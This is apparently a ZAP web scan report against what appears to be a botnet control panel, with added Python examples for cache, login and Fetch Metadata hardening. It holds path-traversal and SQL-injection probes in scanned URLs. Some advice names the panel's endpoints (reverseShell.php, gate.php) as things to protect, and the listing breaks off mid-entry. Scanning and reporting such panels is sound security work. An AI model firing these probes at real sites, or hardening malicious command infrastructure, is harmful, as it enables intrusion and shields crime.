Attack
Evidence no-store
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 25
Solution
For this panel the no-store responses are correct and should be kept: Bots.php, dashboard.php, reverseShell.php and tasks_page.php return authenticated, user-specific content and login.php handles credentials, so no shared proxy cache should ever store them. Only a response that carries no sensitive, personal or user-specific information (static assets, for example) should be made storable, by ensuring that the following conditions are satisfied:

The request method must be understood by the cache and defined as being cacheable ("GET", "HEAD", and "POST" are currently defined as cacheable)

The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)

The "no-store" cache directive must not appear in the request or response header fields

For caching by "shared" caches such as "proxy" caches, the "private" response directive must not appear in the response

For caching by "shared" caches such as "proxy" caches, the "Authorization" header field must not appear in the request, unless the response explicitly allows it (using one of the "must-revalidate", "public", or "s-maxage" Cache-Control response directives)

In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:

It must contain an "Expires" header field

It must contain a "max-age" response directive

For "shared" caches such as "proxy" caches, it must contain a "s-maxage" response directive

It must contain a "Cache Control Extension" that allows it to be cached

It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
Reference https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
Tags WSTG-v42-ATHN-06
CWE Id 524
WASC Id 13
Plugin Id 10049
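The conditions listed in the solution above are the RFC 7234 storability rules, and they are easier to apply consistently as code than by eye. The following Python is an added example for this report, not ZAP code: it decides whether a private or a shared cache may store a response, and runs that decision over header sets constructed to mirror the report's instances (no-store on the panel pages, a bare 403 on the directory index, plus a hypothetical static asset that is not on the page).

```python
"""Decide whether an HTTP response is storable by a private or a shared cache,
applying the RFC 7234 section 3 conditions listed in the alert above.

Added example for this report, not ZAP code. The sample header sets are
constructed; the panel's exact Cache-Control values are not in the report.
"""
from typing import Dict, Optional, Tuple

CACHEABLE_METHODS = {"GET", "HEAD", "POST"}
# status codes a cache may store without an explicit freshness signal (RFC 7231 6.1)
DEFAULT_CACHEABLE_STATUS = {200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501}


def parse_cache_control(value: Optional[str]) -> Dict[str, Optional[str]]:
    """'no-store, max-age=0, private' -> {'no-store': None, 'max-age': '0', 'private': None}"""
    directives: Dict[str, Optional[str]] = {}
    for part in (value or "").split(","):
        part = part.strip()
        if not part:
            continue
        name, sep, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') if sep else None
    return directives


def is_storable(method: str, status: int, request_headers: Dict[str, str],
                response_headers: Dict[str, str], shared: bool) -> bool:
    """True if a cache of the given kind (shared=proxy, otherwise private) may store the response."""
    req = {k.lower(): v for k, v in request_headers.items()}
    resp = {k.lower(): v for k, v in response_headers.items()}
    req_cc = parse_cache_control(req.get("cache-control"))
    resp_cc = parse_cache_control(resp.get("cache-control"))

    # hard exclusions
    if method.upper() not in CACHEABLE_METHODS:
        return False
    if not 100 <= status <= 599:           # status class not understood
        return False
    if "no-store" in req_cc or "no-store" in resp_cc:
        return False
    if shared and "private" in resp_cc:
        return False
    if shared and "authorization" in req and not ({"must-revalidate", "public", "s-maxage"} & set(resp_cc)):
        return False

    # at least one explicit cacheability signal; "public" is the directive
    # RFC 7234 names alongside the cache-control extensions
    if "expires" in resp or "max-age" in resp_cc or "public" in resp_cc:
        return True
    if shared and "s-maxage" in resp_cc:
        return True
    return status in DEFAULT_CACHEABLE_STATUS


# Constructed samples: (method, status, request headers, response headers)
REPORT_SAMPLES: Dict[str, Tuple[str, int, Dict[str, str], Dict[str, str]]] = {
    "dashboard.php?id=54": ("GET", 200, {}, {"Cache-Control": "no-store, no-cache, must-revalidate"}),
    "/TQUIA729JAULAMJS/ (403)": ("GET", 403, {}, {"Content-Type": "text/html"}),
    "static/app.js (hypothetical)": ("GET", 200, {}, {"Cache-Control": "public, max-age=86400"}),
}


def audit(samples=REPORT_SAMPLES, shared: bool = True) -> Dict[str, bool]:
    """Storability verdict per sample, as a shared proxy cache would see it."""
    return {name: is_storable(m, s, rq, rs, shared) for name, (m, s, rq, rs) in samples.items()}
```

For the two samples taken from the report the answer is False, which is the desired outcome for an authenticated panel; only the hypothetical static asset comes out storable.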
Informational
Possible Username Enumeration
Description
It may be possible to enumerate usernames, based on differing HTTP responses when valid and invalid usernames are provided. This would greatly increase the probability of success of password brute-forcing attacks against the system. Note that false positives may sometimes be minimised by increasing the 'Attack Strength' Option in ZAP. Please manually check the 'Other Info' field to confirm if this is actually an issue.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter password
Attack Manipulate [form] field: [password] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack Manipulate [cookie] field: [PHPSESSID] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter secret
Attack Manipulate [form] field: [secret] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack Manipulate [form] field: [username] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 4
Solution
Do not divulge details of whether a username is valid or invalid. In particular, for unsuccessful login attempts, do not differentiate between an invalid user and an invalid password in the error message, page title, page contents, HTTP headers, or redirection logic.
Reference https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html
http://sebastian-schinzel.de/_download/ifip-sec2011.pdf
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-IDNT-04
CWE Id 200
WASC Id 13
Plugin Id 40023
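The solution above says what not to reveal; the part that is easy to get wrong is that a login handler can leak the same information through response timing even when the message is uniform, because an unknown username usually skips the expensive hash. The following Python is an added example for this report, not the panel's login.php: a leaky handler next to a hardened one, with the comparison ZAP's enumeration check performs. The user store, password, salts, messages and status codes are constructed for the demo.

```python
"""Login responses that do and do not leak whether a username exists.

Added example for this report; it is not the panel's login.php. The user
store, password, salts, messages and status codes are constructed.
"""
import hashlib
import hmac
import os
from typing import Tuple

ITERATIONS = 60_000  # PBKDF2 rounds kept modest for the demo; production should use more or Argon2


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


# constructed user store: username -> (salt, hash)
_ADMIN_SALT = bytes.fromhex("5d41402abc4b2a76b9719d911017c592")
USERS = {"admin": (_ADMIN_SALT, _hash("correct horse battery staple", _ADMIN_SALT))}

# dummy credentials hashed for unknown usernames so the work done, and hence
# the response time, is the same whether or not the user exists
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash(os.urandom(32).hex(), _DUMMY_SALT)

Response = Tuple[int, str]  # (HTTP status, body)


def login_leaky(username: str, password: str) -> Response:
    """Vulnerable: unknown users and wrong passwords get different status codes,
    different messages and different amounts of work (no hashing for unknown users)."""
    if username not in USERS:
        return 404, "Unknown user"
    salt, stored = USERS[username]
    if _hash(password, salt) != stored:
        return 401, "Wrong password"
    return 200, "Welcome"


def login_uniform(username: str, password: str) -> Response:
    """Hardened: one status and one message for every failure, a constant-time
    digest comparison, and a hash computed even when the username is unknown."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    digest_ok = hmac.compare_digest(_hash(password, salt), stored)
    if not (digest_ok and username in USERS):
        return 401, "Invalid username or password"
    return 200, "Welcome"


def observable_difference(a: Response, b: Response) -> bool:
    """The test ZAP's enumeration scanner performs: can two failed attempts be told apart?"""
    return a != b
```

The same uniformity has to hold for headers and redirects, not only the body: the four instances above were flagged with a 0-byte body and a 252-byte header, so any difference ZAP saw was in the status line or headers.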
Informational
Sec-Fetch-Dest Header is Missing
Description
Sec-Fetch-Dest is a Fetch Metadata request header that browsers attach to describe how the response will be used; for instance, if the value is audio, then the requested resource was asked for by an audio element and must be audio data and not any other type of resource. ZAP reports it missing because its own requests do not carry it; a server cannot add a request header, but it can use Sec-Fetch-Dest together with Sec-Fetch-Site and Sec-Fetch-Mode to reject cross-site requests that should never reach an administrative panel.
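Since the header is something the server consumes rather than emits, the useful action is a server-side resource isolation check. The following Python is an added example for this report, not code from the scanned panel: it applies the resource isolation policy the Chrome team published for Fetch Metadata (allow same-site requests, allow plain cross-site top-level navigations, deny the rest, and pass requests that carry no Fetch Metadata at all because older browsers and non-browser clients do not send it). The header values in the test are constructed.

```python
"""Resource isolation with the Fetch Metadata request headers.

Added example for this report, not code from the scanned panel. The policy
follows the one published by the Chrome team for Fetch Metadata; header
values used in tests are constructed.
"""
from typing import Mapping

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def allow_request(method: str, headers: Mapping[str, str]) -> bool:
    """Return True if the request may be served, False if it should receive a 403."""
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")

    # No Fetch Metadata at all: an older browser or a non-browser client, so
    # the policy cannot be applied (log it rather than break those clients).
    if site is None:
        return True

    # same-origin, same-site and user-initiated ("none") requests are fine
    if site in ("same-origin", "same-site", "none"):
        return True

    # cross-site: permit only a top-level navigation made with a safe method
    # that is not being embedded through <object> or <embed>
    if (h.get("sec-fetch-mode") == "navigate"
            and method.upper() in SAFE_METHODS
            and h.get("sec-fetch-dest") not in ("object", "embed")):
        return True

    return False
```

Wire this in front of every panel endpoint (login.php, gate.php, the id-parameterised pages) before any other handling; it stops cross-site POSTs and cross-site subresource loads of authenticated pages while leaving ordinary links to the login page working.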
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Sec-Fetch-Dest is set by the browser, not by the application, and ZAP's own requests omit it; that is why every instance above is flagged. The server-side control is to read the header when present and reject requests whose destination does not match what the endpoint serves.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Dest
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Sec-Fetch-Mode Header is Missing
Description
Sec-Fetch-Mode allows the server to differentiate between navigation requests (moving between HTML pages, value navigate) and requests that load resources such as images or audio (values cors, no-cors, same-origin or websocket).
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Mode
Attack
